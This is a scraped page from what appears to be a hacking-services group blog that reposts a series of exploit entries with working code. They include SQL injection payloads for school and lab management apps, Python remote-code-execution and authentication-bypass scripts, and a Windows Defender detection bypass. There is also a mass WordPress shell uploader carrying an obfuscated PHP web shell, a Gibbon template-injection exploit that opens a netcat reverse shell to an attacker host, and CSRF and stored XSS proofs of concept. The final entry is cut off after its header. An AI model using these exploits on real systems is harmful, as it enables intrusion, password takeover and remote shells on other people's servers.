Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863104330

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: Smart School 6.4.1 - SQL Injection
# Exploit Author: CraCkEr
# Date: 28/09/2023
# Vendor: QDocs - qdocs.net
# Vendor Homepage: https://smart-school.in/
# Software Link: https://demo.smart-school.in/
# Tested on: Windows 10 Pro
# Impact: Database Access
# CVE: CVE-2023-5495
# CWE: CWE-89 - CWE-74 - CWE-707


## Greetings

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob


## Description

SQL injection attacks can allow unauthorized access to sensitive data, modification of
data and crash the application or make it unavailable, leading to lost revenue and
damage to a company's reputation.


Path: /course/filterRecords/

POST Parameter 'searchdata[0][title]' is vulnerable to SQLi
POST Parameter 'searchdata[0][searchfield]' is vulnerable to SQLi
POST Parameter 'searchdata[0][searchvalue]' is vulnerable to SQLi

searchdata[0][title]=[SQLi]&searchdata[0][searchfield]=[SQLi]&searchdata[0][searchvalue]=[SQLi]

-------------------------------------------
POST /course/filterRecords/ HTTP/1.1


searchdata%5B0%5D%5Btitle%5D=rating&searchdata%5B0%5D%5Bsearchfield%5D=sleep(5)%23&searchdata%5B0%5D%5Bsearchvalue%5D=3

-------------------------------------------

searchdata[0][title]=[SQLi]&searchdata[0][searchfield]=[SQLi]&searchdata[0][searchvalue]=[SQLi]&searchdata[1][title]=[SQLi]&searchdata[1][searchfield]=[SQLi]&searchdata[1][searchvalue]=[SQLi]


Path: /course/filterRecords/


POST Parameter 'searchdata[0][title]' is vulnerable to SQLi
POST Parameter 'searchdata[0][searchfield]' is vulnerable to SQLi
POST Parameter 'searchdata[0][searchvalue]' is vulnerable to SQLi
POST Parameter 'searchdata[1][title]' is vulnerable to SQLi
POST Parameter 'searchdata[1][searchfield]' is vulnerable to SQLi
POST Parameter 'searchdata[1][searchvalue]' is vulnerable to SQLi

---
Parameter: searchdata[0][title] (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
    Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low

Parameter: searchdata[0][searchfield] (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
    Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low

Parameter: searchdata[0][searchvalue] (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
    Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low

Parameter: searchdata[1][title] (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
    Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales'XOR(SELECT(0)FROM(SELECT(SLEEP(5)))a)XOR'Z&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low

Parameter: searchdata[1][searchvalue] (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
    Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z
---


-------------------------------------------
POST /course/filterRecords/ HTTP/1.1


searchdata[0][title]=[SQLi]&searchdata[0][searchfield]=[SQLi]&searchdata[0][searchvalue]=[SQLi]&searchdata[1][title]=[SQLi]&searchdata[1][searchfield]=[SQLi]&searchdata[1][searchvalue]=[SQLi]
-------------------------------------------



Path: /online_admission

---
Parameter: MULTIPART email ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
    Payload: -----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="class_id"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="section_id"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="firstname"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="lastname"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="gender"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="dob"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="mobileno"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="email"\n\n'XOR(SELECT(0)FROM(SELECT(SLEEP(5)))a)XOR'Z\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="file"; filename=""\nContent-Type: application/octet-stream\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="father_name"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="mother_name"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_name"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_relation"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_email"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_pic"; filename=""\nContent-Type: application/octet-stream\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_phone"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_occupation"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_address"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="current_address"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="permanent_address"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="adhar_no"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="samagra_id"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="previous_school"\n\n\n-----------------------------320375734131102816923531485385--
---

POST Parameter 'email' is vulnerable to SQLi

POST /online_admission HTTP/1.1

-----------------------------320375734131102816923531485385
Content-Disposition: form-data; name="email"

*[SQLi]
-----------------------------320375734131102816923531485385


[-] Done
HireHackking 
## Exploit Title: CE Phoenix v1.0.8.20 - Remote Code Execution (RCE) (Authenticated)
#### Date: 2023-11-25
#### Exploit Author: tmrswrr
#### Category: Webapps
#### Vendor Homepage: [CE Phoenix](https://phoenixcart.org/)
#### Version: v1.0.8.20
#### Tested on: [Softaculous Demo - CE Phoenix](https://www.softaculous.com/apps/ecommerce/CE_Phoenix)

## EXPLOIT :

import requests
from bs4 import BeautifulSoup
import sys
import urllib.parse
import random
from time import sleep

class colors:
    OKBLUE = '\033[94m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'
    CBLACK = '\33[30m'
    CRED = '\33[31m'
    CGREEN = '\33[32m'
    CYELLOW = '\33[33m'
    CBLUE = '\33[34m'
    CVIOLET = '\33[35m'
    CBEIGE = '\33[36m'
    CWHITE = '\33[37m'

 
def entry_banner():
    color_random = [colors.CBLUE, colors.CVIOLET, colors.CWHITE, colors.OKBLUE, colors.CGREEN, colors.WARNING,
                    colors.CRED, colors.CBEIGE]
    random.shuffle(color_random)

    banner = color_random[0] + """
     CE Phoenix v1.0.8.20 - Remote Code Execution \n
     Author: tmrswrr
    """
    for char in banner:
        print(char, end='')
        sys.stdout.flush()
        sleep(0.0045)

def get_formid_and_cookies(session, url):
    response = session.get(url, allow_redirects=True)
    if response.ok:
        soup = BeautifulSoup(response.text, 'html.parser')
        formid_input = soup.find('input', {'name': 'formid'})
        if formid_input:
            return formid_input['value'], session.cookies
    return None, None

def perform_exploit(session, url, username, password, command):
    print("\n[+] Attempting to exploit the target...")

   
    initial_url = url + "/admin/define_language.php?lngdir=english&filename=english.php"
    formid, cookies = get_formid_and_cookies(session, initial_url)
    if not formid:
        print("[-] Failed to retrieve initial formid.")
        return

    # Login
    print("[+] Performing login...")
    login_payload = {
        'formid': formid,
        'username': username,
        'password': password
    }
    login_headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'Cookie': f'cepcAdminID={cookies["cepcAdminID"]}',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36',
        'Referer': initial_url
    }
    login_url = url + "/admin/login.php?action=process"
    login_response = session.post(login_url, data=login_payload, headers=login_headers, allow_redirects=True)

    if not login_response.ok:
        print("[-] Login failed.")
        print(login_response.text)
        return

    print("[+] Login successful.")


    new_formid, _ = get_formid_and_cookies(session, login_response.url)
    if not new_formid:
        print("[-] Failed to retrieve new formid after login.")
        return

    # Exploit
    print("[+] Executing the exploit...")
    encoded_command = urllib.parse.quote_plus(command)
    exploit_payload = f"formid={new_formid}&file_contents=%3C%3Fphp+echo+system%28%27{encoded_command}%27%29%3B"
    exploit_headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'Cookie': f'cepcAdminID={cookies["cepcAdminID"]}',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36',
        'Referer': login_response.url
    }
    exploit_url = url + "/admin/define_language.php?lngdir=english&filename=english.php&action=save"
    exploit_response = session.post(exploit_url, data=exploit_payload, headers=exploit_headers, allow_redirects=True)

    if exploit_response.ok:
        print("[+] Exploit executed successfully.")
    else:
        print("[-] Exploit failed.")
        print(exploit_response.text)

    
    final_response = session.get(url)
    print("\n[+] Executed Command Output:\n")
    print(final_response.text)  

def main(base_url, username, password, command):
    print("\n[+] Starting the exploitation process...")
    session = requests.Session()
    perform_exploit(session, base_url, username, password, command)

if __name__ == "__main__":
    entry_banner()

    if len(sys.argv) < 5:
        print("Usage: python script.py [URL] [username] [password] [command]")
        sys.exit(1)

    base_url = sys.argv[1]
    username = sys.argv[2]
    password = sys.argv[3]
    command = sys.argv[4]

    main(base_url, username, password, command)
HireHackking 
[+] Credits: John Page (aka hyp3rlinx)		
[+] Website: hyp3rlinx.altervista.org
[+] Source:  https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART_3.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec     
 

[Vendor]
www.microsoft.com


[Product]
Windows Defender


[Vulnerability Type]
Windows Defender Detection Mitigation Bypass
TrojanWin32Powessere.G


[CVE Reference]
N/A


[Security Issue]
Typically, Windows Defender detects and prevents TrojanWin32Powessere.G aka "POWERLIKS" type execution that leverages rundll32.exe. Attempts at execution fail
and attackers will typically get an "Access is denied" error message.

Back in 2022, I first disclosed how that could be easily bypassed by passing an extra path traversal when referencing mshtml but since has been mitigated.
Recently Feb 7, 2024, I disclosed using multi-commas "," will bypass that mitigation but has since been fixed again.
The fix was short lived as I find yet another third trivial bypass soon after.


[Exploit/POC]
Open command prompt as Administrator.

C:\sec>rundll32.exe javascript:"\..\..\mshtml,,RunHTMLApplication ";alert(13)
Access is denied.

C:\sec>rundll32.exe javascript:"\\..\\..\\mshtml\\..\\..\\mshtml,RunHTMLApplication ";alert('HYP3RLINX')


[Video PoC URL]
https://www.youtube.com/watch?v=yn9gdJ7c7Kg


[Network Access]
Local


[Severity]
High


[References]
https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt
https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART2.txt
https://twitter.com/hyp3rlinx/status/1755417914599956833
https://twitter.com/hyp3rlinx/status/1758624140213264601


[Disclosure Timeline]
Vendor Notification:  
February 16, 2024 : Public Disclosure


[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx
HireHackking 
# Exploit Title: Wordpress Plugin - Membership For WooCommerce < v2.1.7 - Arbitrary File Upload to Shell (Unauthenticated)
# Date: 2024-02-25
# Author: Milad Karimi (Ex3ptionaL)
# Category : webapps
# Tested on: windows 10 , firefox

import sys , requests, re , json
from multiprocessing.dummy import Pool
from colorama import Fore
from colorama import init
init(autoreset=True)

headers = {'Connection': 'keep-alive', 'Cache-Control': 'max-age=0',
'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozlila/5.0 (Linux;
Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like
Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate', 'Accept-Language':
'en-US,en;q=0.9,fr;q=0.8', 'referer': 'www.google.com'}

uploader = """
GIF89a
<?php ?>
<!DOCTYPE html>
<html>
<head>
  <title>Resultz</title>
</head>
<body><h1>Uploader</h1>
  <form enctype='multipart/form-data' action='' method='POST'>
    <p>Uploaded</p>
    <input type='file' name='uploaded_file'></input><br />
    <input type='submit' value='Upload'></input>
  </form>
</body>
</html>
<?PHP
if(!empty($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')])){$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485=base64_decode('Li8=');$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485=$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485.basename($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')][base64_decode('bmFtZQ==')]);if(move_uploaded_file($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')][base64_decode('dG1wX25hbWU=')],$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485)){echo
base64_decode('VGhlIGZpbGUg').basename($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')][base64_decode('bmFtZQ==')]).base64_decode('IGhhcyBiZWVuIHVwbG9hZGVk');}else{echo
base64_decode('VGhlcmUgd2FzIGFuIGVycm9yIHVwbG9hZGluZyB0aGUgZmlsZSwgcGxlYXNlIHRyeSBhZ2FpbiE=');}}?>
"""
requests.urllib3.disable_warnings()

def Exploit(Domain):
    try:
        if 'http' in Domain:
          Domain = Domain
        else:
          Domain = 'http://'+Domain
        myup = {'': ('db.php', uploader)}
        req = requests.post(Domain +
'/wp-admin/admin-ajax.php?action=wps_membership_csv_file_upload',
files=myup, headers=headers,verify=False, timeout=10).text
        req1 = requests.get(Domain +
'/wp-content/uploads/mfw-activity-logger/csv-uploads/db.php')
        if 'Ex3ptionaL' in req1:
          print (fg+'[+] '+ Domain + ' --> Shell Uploaded')
          open('Shellz.txt', 'a').write(Domain +
'/wp-content/uploads/mfw-activity-logger/csv-uploads/db.php' + '\n')
        else:
          print (fr+'[+] '+ Domain + '{}{} --> Not Vulnerability')
    except:
        print(fr+' -| ' + Domain + ' --> {} [Failed]')

target = open(input(fm+"Site List: "), "r").read().splitlines()
mp = Pool(int(input(fm+"Threads: ")))
mp.map(Exploit, target)
mp.close()
mp.join()
HireHackking 
# Exploit Title: Gibbon LMS v26.0.00 - SSTI vulnerability
# Date: 21.01.2024
# Exploit Author: SecondX.io Research Team(Islam Rzayev,Fikrat Guliev, Ali Maharramli)
# Vendor Homepage: https://gibbonedu.org/
# Software Link: https://github.com/GibbonEdu/core
# Version: v26.0.00
# Tested on: Ubuntu 22.0
# CVE : CVE-2024-24724

import requests
import re
import sys


def login(target_host, target_port,email,password):
     url = f'http://{target_host}:{target_port}/login.php?timeout=true'
     headers = {"Content-Type": "multipart/form-data; 
boundary=---------------------------174475955731268836341556039466"}
     data = 
f"-----------------------------174475955731268836341556039466\r\nContent-Disposition: 
form-data; 
name=\"address\"\r\n\r\n\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: 
form-data; 
name=\"method\"\r\n\r\ndefault\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: 
form-data; 
name=\"username\"\r\n\r\n{email}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: 
form-data; 
name=\"password\"\r\n\r\n{password}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: 
form-data; 
name=\"gibbonSchoolYearID\"\r\n\r\n025\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: 
form-data; 
name=\"gibboni18nID\"\r\n\r\n0002\r\n-----------------------------174475955731268836341556039466--\r\n"
     r = requests.post(url, headers=headers, data=data, 
allow_redirects=False)
     Session_Cookie = re.split(r"\s+", r.headers['Set-Cookie'])
     if Session_Cookie[4] is not None and '/index.php' in 
str(r.headers['Location']):
         print("login successful!")

     return Session_Cookie[4]



def rce(cookie, target_host, target_port, attacker_ip, attacker_port):
     url = 
f'http://{target_host}:{target_port}/modules/School%20Admin/messengerSettingsProcess.php'
     headers = {"Content-Type": "multipart/form-data; 
boundary=---------------------------67142646631840027692410521651", 
"Cookie": cookie}
     data = 
f"-----------------------------67142646631840027692410521651\r\nContent-Disposition: 
form-data; name=\"address\"\r\n\r\n/modules/School 
Admin/messengerSettings.php\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition: 
form-data; 
name=\"enableHomeScreenWidget\"\r\n\r\nY\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition: 
form-data; name=\"signatureTemplate\"\r\n\r\n{{{{[\'rm /tmp/f;mkfifo 
/tmp/f;cat /tmp/f|sh -i 2>&1|nc {attacker_ip} {attacker_port} 
 >/tmp/f']|filter('system')}}}}\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition: form-data; name=\"messageBcc\"\r\n\r\n\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition: form-data; name=\"pinnedMessagesOnHome\"\r\n\r\nN\r\n-----------------------------67142646631840027692410521651--\r\n"
     r = requests.post(url, headers=headers, data=data, 
allow_redirects=False)
     if 'success0' in str(r.headers['Location']):
         print("Payload uploaded successfully!")



def trigger(cookie, target_host, target_port):
     url = 
f'http://{target_host}:{target_port}/index.php?q=/modules/School%20Admin/messengerSettings.php&return=success0'
     headers = {"Cookie": cookie}
     print("RCE successful!")
     r = requests.get(url, headers=headers, allow_redirects=False)


if __name__ == '__main__':
     if len(sys.argv) != 7:
         print("Usage: script.py <target_host> <target_port> 
<attacker_ip> <attacker_port> <email> <password>")
         sys.exit(1)
     cookie = login(sys.argv[1], sys.argv[2],sys.argv[5],sys.argv[6])
     rce(cookie, sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4])
     trigger(cookie, sys.argv[1], sys.argv[2])
HireHackking 
# Exploit Title: Casdoor < v1.331.0 - '/api/set-password' CSRF
# Application: Casdoor
# Version: <= 1.331.0
# Date: 03/07/2024
# Exploit Author: Van Lam Nguyen 
# Vendor Homepage: https://casdoor.org/
# Software Link: https://github.com/casdoor/casdoor
# Tested on: Windows
# CVE : CVE-2023-34927

Overview
==================================================
Casdoor v1.331.0 and below was discovered to contain a Cross-Site Request Forgery (CSRF) in the endpoint /api/set-password. 
This vulnerability allows attackers to arbitrarily change the victim user's password via supplying a crafted URL.

Proof of Concept
==================================================

Made an unauthorized request to /api/set-password that bypassed the old password entry authentication step

<html>
<form action="http://localhost:8000/api/set-password" method="POST">
    <input name='userOwner' value='built&#45;in' type='hidden'>
    <input name='userName' value='admin' type='hidden'>
    <input name='newPassword' value='hacked' type='hidden'>
    <input type=submit>
</form>
<script>
    history.pushState('', '', '/');
    document.forms[0].submit();
</script>

</html>

If a user is logged into the Casdoor Webapp at time of execution, a new user will be created in the app with the following credentials

userOwner: built&#45;in
userName: admin
newPassword: hacked
HireHackking 
# Title: Computer Laboratory Management System v1.0 - Multiple-SQLi
# Author: nu11secur1ty
# Date: 03/28/2024
# Vendor: https://github.com/oretnom23
# Software: https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html#comment-104400
# Reference: https://portswigger.net/web-security/sql-injection

# Description:
The id parameter appears to be vulnerable to SQL injection attacks.
The payload '+(select
load_file('\\\\95ctkydmc3d4ykhxxtph7p6xgomiagy71vsij68.tupgus.com\\mpk'))+'
was submitted in the id parameter. This payload injects a SQL
sub-query that calls MySQL's load_file function with a UNC file path
that references a URL on an external domain. The application
interacted with that domain, indicating that the injected SQL query
was executed. The attacker can get all information from the system by
using this vulnerability!

STATUS: HIGH- Vulnerability

[+]Payload:
```mysql
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY
or GROUP BY clause
    Payload: page=user/manage_user&id=7''' RLIKE (SELECT (CASE WHEN
(2375=2375) THEN 0x372727 ELSE 0x28 END)) AND 'fkKl'='fkKl

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
    Payload: page=user/manage_user&id=7''' AND (SELECT 1734
FROM(SELECT COUNT(*),CONCAT(0x716a707071,(SELECT
(ELT(1734=1734,1))),0x71717a7871,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'CYrv'='CYrv

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=user/manage_user&id=7''' AND (SELECT 6760 FROM
(SELECT(SLEEP(7)))iMBe) AND 'xzwU'='xzwU

    Type: UNION query
    Title: MySQL UNION query (NULL) - 11 columns
    Payload: page=user/manage_user&id=-2854' UNION ALL SELECT
NULL,NULL,NULL,NULL,CONCAT(0x716a707071,0x6675797766656155594373736b724a5a6875526f6f65684562486c48664e4d624f75766b4a444b43,0x71717a7871),NULL,NULL,NULL,NULL,NULL,NULL#
---
HireHackking 
# Exploit Title: Axigen < 10.5.7 - Persistent Cross-Site Scripting
# Date: 2023-09-25
# Exploit Author: Vinnie McRae - RedTeamer IT Security
# Vendor Homepage: https://www.axigen.com/
# Software Link: https://www.axigen.com/mail-server/download/
# Version: (10.5.7) and older version of Axigen WebMail
# Tested on: firefox, chrome
# CVE: CVE-2023-48974

Description

The `serverName_input` parameter is vulnerable to stored cross-site
scripting (XSS) due to unsanitized or unfiltered processing. This means
that an attacker can inject malicious code into this parameter, which will
then be executed by other users when they view the page where the parameter
is used. This is affecting authenticated administrators, and the attack can
be used to attack other administrators with more permissions.

Exploitation

1. Login as administrator
2. Navigate to "global settings"
3. Change server name to <script>alert(1)</script>

PoC of the POST request:

```
POST /?_h=1bb40e85937506a7186a125bd8c5d7ef&page=gl_set HTTP/1.1
Host: localhost:9443
Cookie: eula=true;
WMSessionObject=%7B%22accountFilter%22%3A%22%22%2C%22currentDomainName%22%3A%22axigen%22%2C%22currentPrincipal%22%3A%22nada%22%2C%22domainFilter%22%3A%22%22%2C%22folderRecipientFilter%22%3A%22%22%2C%22groupFilter%22%3A%22%22%2C%22helpContainer%22%3A%22opened%22%2C%22leftMenu%22%3A%5B%22rights%22%2C%22services%22%2C%22clustering%22%2C%22domains%22%2C%22logging%22%2C%22backup%22%2C%22security%22%5D%2C%22mlistFilter%22%3A%22%22%2C%22premiumFilter%22%3A%22%22%2C%22sslCertificateFilter%22%3A%22%22%7D;
webadminIsModified=false; webadminIsUpdated=true; webadminIsSaved=true;
public_language=en; _hadmin=6a8ed241fe53d1b28f090146e4c65f52;
menuLeftTopPosition=-754
Content-Type: multipart/form-data;
boundary=---------------------------41639384187581032291088896642
Content-Length: 12401
Connection: close

-----------------------------41639384187581032291088896642
Content-Disposition: form-data; name="serverName_input"

<script>alert(1)</script>
-----------------------------41639384187581032291088896642
Content-Disposition: form-data; name="primary_domain_input"

axigen
-----------------------------41639384187581032291088896642
Content-Disposition: form-data; name="ssl_random_file_input"

--SNIP--

-----------------------------41639384187581032291088896642
Content-Disposition: form-data; name="update"

Save Configuration
-----------------------------41639384187581032291088896642--
```



#______________________________
#Vinnie McRae
#RedTeamer IT Security
#Blog: redteamer.de/blog-beitrag/
HireHackking 
# Exploit Title: ESET NOD32 Antivirus 17.0.16.0 - Unquoted Service Path
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Exploit Date: 2024-04-01
# Vendor : https://www.eset.com
# Version : 17.0.16.0
# Tested on OS: Microsoft Windows 10 pro x64

C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
|findstr /i /v "c:\windows\\" |findstr /i /v """

ESET Updater ESETServiceSvc C:\Program Files (x86)\ESET\ESET
Security\ekrn.exe

C:\>sc qc ekrn
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ekrn
        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files\ESET\ESET Security\ekrn.exe"
        LOAD_ORDER_GROUP   : Base
        TAG                : 0
        DISPLAY_NAME       : ESET Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\>systeminfo

OS Name:  Microsoft Windows 10 Pro
OS Version: 10.0.19045 N/A Build 19045
OS Manufacturer: Microsoft Corporation
HireHackking 
# Exploit Title: Positron Broadcast Signal Processor TRA7005 v1.20 - Authentication Bypass
# Author: LiquidWorm
# Vendor: Positron srl
# Product web page: https://www.positron.it
#                   https://www.positron.it/prodotti/apparati-broadcast/stereo-multicoder/tra-7005/
# Affected version: 1.20
#                   TRA7K5_REV107
#                   TRA7K5_REV106
#                   TRA7K5_REV104
#                   TRA7K5_REV102
#
# Summary: The TRA7000 series is a set of products dedicated to broadcast, designed to
# guarantee an excellent quality-price ratio in compliance with current regulations and
# intended for individual broadcasters or radio networks. All models in the TRA7000 series
# are fully digital, using only high-quality components such as 24-bit A/D and D/A converters
# and 32-bit DSP. The TRA7005 performs the functions of Stereo Coder, RDS Coder, 5-output
# MPX Distributor, AGC (adjustable) for both analogue and digital audio inputs, Clipper
# for both analogue and digital audio inputs, change-over emergency switching between any
# input with adjustable thresholds and intervention times, both in the switching phase on
# the secondary source and in the return phase to the primary source. Ethernet connection
# with Web-Server (optional) for total control and management of the device. Advanced BYPASS
# system between MPX input and outputs, active on operating and power supply anomalies and
# can also be activated remotely.
#
# Desc: The Positron Broadcast Digital Signal Processor TRA7005 suffers from an authentication
# bypass through a direct and unauthorized access to the password management functionality.
# The vulnerability allows attackers to bypass Digest authentication by manipulating the
# password endpoint _Passwd.html and its payload data to set a user's password to arbitrary
# value or remove it entirely. This grants unauthorized access to protected areas (/user,
# /operator, /admin) of the application without requiring valid credentials, compromising
# the device's system security.
#
# Tested on: Positron Web Server
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2024-5813
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5813.php
#
#
# 22.03.2024
#
#


import requests,sys

print("""
______________________________________
┏┳┓•      ┏┓            ┓  ┏┓    ┓  • 
 ┃ ┓┏┓┓┏  ┃┃┏┓┏┏┓┏┏┏┓┏┓┏┫  ┣ ┓┏┏┓┃┏┓┓╋
 ┻ ┗┛┗┗┫  ┣┛┗┻┛┛┗┻┛┗┛┛ ┗┻  ┗┛┛┗┣┛┗┗┛┗┗
       ┛                       ┛
                 for
   Positron Digital Signal Processor
             ZSL-2024-5813
______________________________________
""")

if len(sys.argv) != 4:
    print("Usage: python positron.py <ip:port> <user/oper/admin> <erase/new_pwd>")
    sys.exit(1)

ip = sys.argv[1]
ut = sys.argv[2]
wa = sys.argv[3]

valid_ut = ['user', 'oper', 'admin']
if ut.lower() not in valid_ut:
    print("Invalid user type! Use 'user', 'oper', or 'admin'.")
    sys.exit(1)

url = f'http://{ip}/_Passwd.html'
did = f'http://{ip}/_Device.html'

try:
    r = requests.get(did)
    if r.status_code == 200 and 'TRA7K5' in r.text:
        print("Vulnerable processor found!")
    else:
        print("Not Vulnerable or not applicable. Exploit exiting.")
        sys.exit(1)
except requests.exceptions.RequestException as e:
    print(f"Error checking device: {e}")
    sys.exit(1)

headers = {
    'Content-Type'   : 'application/x-www-form-urlencoded',
    'Accept-Language': 'mk-MK,en;q=0.6',
    'Accept-Encoding': 'gzip, deflate',
    'User-Agent'     : 'R-Marina/11.9',
    'Accept'         : '*/*'
}

payload = {}
if wa.lower() == 'erase':
    payload[f'PSW_{ut.capitalize()}'] = 'NONE'
else:
    payload_key = f'PSW_{ut.capitalize()}'
    payload[payload_key] = wa
    #print(payload)

r = requests.post(url, headers=headers, data=payload)
print(r.status_code)
print(r.text)
HireHackking 
## Title: Human Resource Management System v1.0 - Multiple SQLi
## Author: nu11secur1ty
## Date: 04/02/2024
## Vendor: https://github.com/oretnom23
